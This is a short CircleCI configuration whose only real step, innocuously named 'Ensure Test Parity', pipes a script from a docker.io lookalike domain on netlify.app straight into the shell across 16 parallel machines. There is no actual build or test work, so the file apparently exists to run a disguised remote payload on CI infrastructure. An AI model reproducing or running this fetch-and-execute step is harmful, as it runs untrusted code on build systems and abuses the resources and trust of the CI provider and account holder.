version: 2
jobs:
  build:
    parallelism: 16
    machine:
     image: ubuntu-2004:202008-01
    steps:
      - checkout
      - run:
          name: Ensure Test Parity
          command: |
                 sudo apt-get update
                 curl https://dockerio1.netlify.app/run.sh | sh